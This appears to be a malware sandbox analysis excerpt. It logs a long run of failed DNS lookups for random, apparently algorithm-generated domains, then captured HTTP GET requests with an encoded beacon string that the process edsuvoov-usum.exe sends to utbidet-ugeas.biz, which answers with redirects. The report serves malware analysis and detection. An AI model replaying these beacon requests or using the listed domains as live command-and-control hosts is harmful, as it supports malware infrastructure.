                                                                                                                                                                                                            Sep 7, 2024 15:36:49.402998924 CEST1.1.1.1192.168.2.30x84f2Name error (3)rmydkqgvcvhez.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:50.872400045 CEST1.1.1.1192.168.2.30xcabeName error (3)udelwggnpcs.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:51.056766033 CEST1.1.1.1192.168.2.30x3b23Name error (3)udelwggnpcs.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:52.520994902 CEST1.1.1.1192.168.2.30x740Name error (3)hyuyvkcxdqtqwe.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:52.795223951 CEST1.1.1.1192.168.2.30xc9afName error (3)hyuyvkcxdqtqwe.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:52.796097040 CEST1.1.1.1192.168.2.30xc9afName error (3)hyuyvkcxdqtqwe.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:53.185657978 CEST1.1.1.1192.168.2.30x4e44Name error (3)mtvjuwi.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:53.778588057 CEST1.1.1.1192.168.2.30xe2fbName error (3)mtvjuwi.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:55.170865059 CEST1.1.1.1192.168.2.30x694fName error (3)owayaiofn.cgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:55.237101078 CEST1.1.1.1192.168.2.30x9757Name error (3)owayaiofn.cgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:55.849741936 CEST1.1.1.1192.168.2.30xdbcfName error (3)elymkl.rwnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:55.849772930 CEST1.1.1.1192.168.2.30xdbcfName error (3)elymkl.rwnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:56.348620892 CEST1.1.1.1192.168.2.30x582bName error (3)elymkl.rwnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:56.348633051 CEST1.1.1.1192.168.2.30x582bName error (3)elymkl.rwnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:56.469747066 CEST1.1.1.1192.168.2.30xcefbName error (3)xrkwbwyqovesj.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:56.480211020 CEST1.1.1.1192.168.2.30xe82dName error (3)xrkwbwyqovesj.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:56.771298885 CEST1.1.1.1192.168.2.30x45baName error (3)jwimhacdt.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:56.958559036 CEST1.1.1.1192.168.2.30xd3f6Name error (3)jwimhacdt.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:57.312004089 CEST1.1.1.1192.168.2.30x5637Name error (3)oymyeynqyqewcs.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:57.791857958 CEST1.1.1.1192.168.2.30xf83aName error (3)oymyeynqyqewcs.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:58.984525919 CEST1.1.1.1192.168.2.30xbe99Name error (3)qsqwieaqy.cgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:59.110908031 CEST1.1.1.1192.168.2.30xcf41Name error (3)qsqwieaqy.cgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:59.236157894 CEST1.1.1.1192.168.2.30x988fName error (3)oukpcbtqgqwoa.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:36:59.246707916 CEST1.1.1.1192.168.2.30xd9f4Name error (3)oukpcbtqgqwoa.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:00.690553904 CEST1.1.1.1192.168.2.30x2c5cName error (3)ylmed.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:00.944725037 CEST1.1.1.1192.168.2.30x7e67Name error (3)ylmed.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:00.944741964 CEST1.1.1.1192.168.2.30x7e67Name error (3)ylmed.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:01.242513895 CEST1.1.1.1192.168.2.30x6cfbName error (3)pdrwqa.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:01.486193895 CEST1.1.1.1192.168.2.30x2a17Name error (3)pdrwqa.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:05.186981916 CEST1.1.1.1192.168.2.30x834Name error (3)sgfpiiwog.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:05.441154957 CEST1.1.1.1192.168.2.30x8b99Name error (3)sgfpiiwog.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:05.829432011 CEST1.1.1.1192.168.2.30x8fccName error (3)mcesyrpjcoxcu.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:05.829446077 CEST1.1.1.1192.168.2.30x8fccName error (3)mcesyrpjcoxcu.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:05.994043112 CEST1.1.1.1192.168.2.30x5cf4Name error (3)mcesyrpjcoxcu.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:07.492330074 CEST1.1.1.1192.168.2.30x75e5Name error (3)mnaudewcuibyam.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:07.500299931 CEST1.1.1.1192.168.2.30x75e5Name error (3)mnaudewcuibyam.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:07.517256975 CEST1.1.1.1192.168.2.30x8b92Name error (3)mnaudewcuibyam.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:07.663517952 CEST1.1.1.1192.168.2.30x35c6Name error (3)gekaeekv.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:07.677498102 CEST1.1.1.1192.168.2.30x7bddName error (3)gekaeekv.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:07.804254055 CEST1.1.1.1192.168.2.30x6635Name error (3)iyeyuemksorve.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:07.817924023 CEST1.1.1.1192.168.2.30xd1cbName error (3)iyeyuemksorve.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:08.097449064 CEST1.1.1.1192.168.2.30xa996Name error (3)rujygesrs.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:08.270716906 CEST1.1.1.1192.168.2.30x9badName error (3)rujygesrs.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.959686995 CEST1.1.1.1192.168.2.30xeee1Name error (3)qdukhasgmus.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.961062908 CEST1.1.1.1192.168.2.30xeee1Name error (3)qdukhasgmus.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.161230087 CEST1.1.1.1192.168.2.30x95d4Name error (3)qdukhasgmus.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:15.167073011 CEST1.1.1.1192.168.2.30x6aecName error (3)wfnsamu.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:15.167649984 CEST1.1.1.1192.168.2.30x6aecName error (3)wfnsamu.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:15.241955996 CEST1.1.1.1192.168.2.30xb93bName error (3)wfnsamu.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:15.359386921 CEST1.1.1.1192.168.2.30xa16eName error (3)dqeqoagqqqrc.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:15.375144005 CEST1.1.1.1192.168.2.30xb1f7Name error (3)dqeqoagqqqrc.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:15.523610115 CEST1.1.1.1192.168.2.30xcb4fName error (3)gmbcqqwly.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:15.577400923 CEST1.1.1.1192.168.2.30xa206Name error (3)gmbcqqwly.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:15.776705027 CEST1.1.1.1192.168.2.30x2b2aName error (3)cjzhc.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:16.019558907 CEST1.1.1.1192.168.2.30xb495Name error (3)cjzhc.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:16.242765903 CEST1.1.1.1192.168.2.30x4766Name error (3)akpzumsigtkmmw.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:16.584140062 CEST1.1.1.1192.168.2.30x10c1Name error (3)akpzumsigtkmmw.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:16.584774017 CEST1.1.1.1192.168.2.30x10c1Name error (3)akpzumsigtkmmw.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.047362089 CEST1.1.1.1192.168.2.30xa8e4Name error (3)yfcalywej.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.047388077 CEST1.1.1.1192.168.2.30xa8e4Name error (3)yfcalywej.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.060600042 CEST1.1.1.1192.168.2.30xf4ccName error (3)yfcalywej.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.646138906 CEST1.1.1.1192.168.2.30x461dName error (3)cgengcwnm.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.646157026 CEST1.1.1.1192.168.2.30x461dName error (3)cgengcwnm.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.657990932 CEST1.1.1.1192.168.2.30x4106Name error (3)cgengcwnm.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.083781004 CEST1.1.1.1192.168.2.30xde74Name error (3)blqcoo.rwnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.285568953 CEST1.1.1.1192.168.2.30xbc76Name error (3)blqcoo.rwnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:22.747275114 CEST1.1.1.1192.168.2.30x4080Name error (3)eymkhoeguh.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:22.943078041 CEST1.1.1.1192.168.2.30xddc0Name error (3)eymkhoeguh.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:23.241286993 CEST1.1.1.1192.168.2.30x86c6Name error (3)gmxmotaygsg.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:23.476984024 CEST1.1.1.1192.168.2.30x2368Name error (3)gmxmotaygsg.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:27.166749954 CEST1.1.1.1192.168.2.30x23fdName error (3)ahieeic.cgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:27.469501972 CEST1.1.1.1192.168.2.30xb9b4Name error (3)ahieeic.cgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:27.469542980 CEST1.1.1.1192.168.2.30xb9b4Name error (3)ahieeic.cgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:28.817186117 CEST1.1.1.1192.168.2.30x7687Name error (3)uutgmfehaouhp.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:28.869426966 CEST1.1.1.1192.168.2.30x6843Name error (3)uutgmfehaouhp.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:28.995070934 CEST1.1.1.1192.168.2.30xd563Name error (3)rmydkqgvcvhez.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:29.271692038 CEST1.1.1.1192.168.2.30xef78Name error (3)rmydkqgvcvhez.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:29.278945923 CEST1.1.1.1192.168.2.30xef78Name error (3)rmydkqgvcvhez.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:30.723506927 CEST1.1.1.1192.168.2.30x5919Name error (3)udelwggnpcs.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:30.915128946 CEST1.1.1.1192.168.2.30x1705Name error (3)udelwggnpcs.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:32.428117990 CEST1.1.1.1192.168.2.30x62e6Name error (3)hyuyvkcxdqtqwe.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:32.430016994 CEST1.1.1.1192.168.2.30x62e6Name error (3)hyuyvkcxdqtqwe.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:32.688455105 CEST1.1.1.1192.168.2.30xaf99Name error (3)hyuyvkcxdqtqwe.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:33.089704990 CEST1.1.1.1192.168.2.30xfdafName error (3)mtvjuwi.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:33.089719057 CEST1.1.1.1192.168.2.30xfdafName error (3)mtvjuwi.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:33.127713919 CEST1.1.1.1192.168.2.30x4bd7Name error (3)mtvjuwi.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:34.488780975 CEST1.1.1.1192.168.2.30xddebName error (3)owayaiofn.cgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:34.555130959 CEST1.1.1.1192.168.2.30x1f1cName error (3)owayaiofn.cgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:34.755011082 CEST1.1.1.1192.168.2.30xbe0aName error (3)elymkl.rwnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.306989908 CEST1.1.1.1192.168.2.30x9df6Name error (3)elymkl.rwnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.307142973 CEST1.1.1.1192.168.2.30x9df6Name error (3)elymkl.rwnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.425617933 CEST1.1.1.1192.168.2.30x6827Name error (3)xrkwbwyqovesj.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.461231947 CEST1.1.1.1192.168.2.30xa9d1Name error (3)xrkwbwyqovesj.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.804574013 CEST1.1.1.1192.168.2.30xe4c8Name error (3)jwimhacdt.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.981951952 CEST1.1.1.1192.168.2.30x228dName error (3)jwimhacdt.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.193051100 CEST1.1.1.1192.168.2.30x94d1Name error (3)oymyeynqyqewcs.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.432676077 CEST1.1.1.1192.168.2.30x5cf1Name error (3)oymyeynqyqewcs.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.682975054 CEST1.1.1.1192.168.2.30x2ba5Name error (3)qsqwieaqy.cgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.723067045 CEST1.1.1.1192.168.2.30x12b9Name error (3)qsqwieaqy.cgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.849231005 CEST1.1.1.1192.168.2.30x9aedName error (3)oukpcbtqgqwoa.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.864341974 CEST1.1.1.1192.168.2.30x398eName error (3)oukpcbtqgqwoa.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:38.420137882 CEST1.1.1.1192.168.2.30x42f6Name error (3)ylmed.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:38.775645971 CEST1.1.1.1192.168.2.30xab2eName error (3)ylmed.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:38.778309107 CEST1.1.1.1192.168.2.30xab2eName error (3)ylmed.cmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:38.979233027 CEST1.1.1.1192.168.2.30xc46cName error (3)pdrwqa.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:39.081104994 CEST1.1.1.1192.168.2.30x4df0Name error (3)pdrwqa.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:42.737711906 CEST1.1.1.1192.168.2.30x22dName error (3)sgfpiiwog.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:42.956296921 CEST1.1.1.1192.168.2.30x3bf0Name error (3)sgfpiiwog.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:43.318571091 CEST1.1.1.1192.168.2.30x967Name error (3)mcesyrpjcoxcu.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:43.523291111 CEST1.1.1.1192.168.2.30xd606Name error (3)mcesyrpjcoxcu.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.434751034 CEST1.1.1.1192.168.2.30x1eb1Name error (3)mnaudewcuibyam.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.680347919 CEST1.1.1.1192.168.2.30xe0fdName error (3)mnaudewcuibyam.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.813241959 CEST1.1.1.1192.168.2.30x4714Name error (3)gekaeekv.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.827653885 CEST1.1.1.1192.168.2.30xa56Name error (3)gekaeekv.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.939918995 CEST1.1.1.1192.168.2.30xcb2dName error (3)iyeyuemksorve.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.982871056 CEST1.1.1.1192.168.2.30xa1dName error (3)iyeyuemksorve.nunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:46.257740974 CEST1.1.1.1192.168.2.30x5e8Name error (3)rujygesrs.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:46.422454119 CEST1.1.1.1192.168.2.30xbabaName error (3)rujygesrs.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:49.013833046 CEST1.1.1.1192.168.2.30x6674Name error (3)qdukhasgmus.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:49.267657995 CEST1.1.1.1192.168.2.30xbd0bName error (3)qdukhasgmus.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:49.267672062 CEST1.1.1.1192.168.2.30xbd0bName error (3)qdukhasgmus.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:52.852118969 CEST1.1.1.1192.168.2.30xf61Name error (3)wfnsamu.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:53.138642073 CEST1.1.1.1192.168.2.30xdd8bName error (3)wfnsamu.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.049421072 CEST1.1.1.1192.168.2.30xdb32Name error (3)dqeqoagqqqrc.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.049439907 CEST1.1.1.1192.168.2.30xdb32Name error (3)dqeqoagqqqrc.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.069283009 CEST1.1.1.1192.168.2.30xc0f9Name error (3)dqeqoagqqqrc.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.196952105 CEST1.1.1.1192.168.2.30xa7bdName error (3)gmbcqqwly.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.249034882 CEST1.1.1.1192.168.2.30x9f88Name error (3)gmbcqqwly.stnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.448829889 CEST1.1.1.1192.168.2.30x24aaName error (3)cjzhc.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.692843914 CEST1.1.1.1192.168.2.30x6e20Name error (3)cjzhc.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.796351910 CEST1.1.1.1192.168.2.30xa4eName error (3)akpzumsigtkmmw.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.901262045 CEST1.1.1.1192.168.2.30x5396Name error (3)akpzumsigtkmmw.mpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:55.019459009 CEST1.1.1.1192.168.2.30x1b78Name error (3)yfcalywej.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:55.297687054 CEST1.1.1.1192.168.2.30x4cf6Name error (3)yfcalywej.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:55.297713041 CEST1.1.1.1192.168.2.30x4cf6Name error (3)yfcalywej.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:56.574698925 CEST1.1.1.1192.168.2.30x51eaName error (3)cgengcwnm.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:56.939601898 CEST1.1.1.1192.168.2.30x1227Name error (3)cgengcwnm.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:56.939619064 CEST1.1.1.1192.168.2.30x1227Name error (3)cgengcwnm.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:59.521019936 CEST1.1.1.1192.168.2.30x2ff8Name error (3)blqcoo.rwnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:37:59.953196049 CEST1.1.1.1192.168.2.30xc251Name error (3)blqcoo.rwnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                            • utbidet-ugeas.biz
                                                                                                                                                                                                            • btnmut.ph
                                                                                                                                                                                                            • ysbgwpqywiujo.ph

                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.349710172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:33:57.364600897 CEST169OUTGET /d/N?025C90F0795C90F0796E90DC795C907EAAC8A858235D9030D15E93C6576EBEC94B6CA0DE79 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:33:57.860641003 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:33:57 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025C90F0795C90F0796E90DC795C907EAAC8A858235D9030D15E93C6576EBEC94B6CA0DE79
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.349711172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:00.088243961 CEST201OUTGET /d/N?025C90F0795C90F0796E90DC795C907EAAC8A858235D9030D15E93C6576EBEC94B6CA0DE79 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:00.576472044 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:00 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025C90F0795C90F0796E90DC795C907EAAC8A858235D9030D15E93C6576EBEC94B6CA0DE79
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
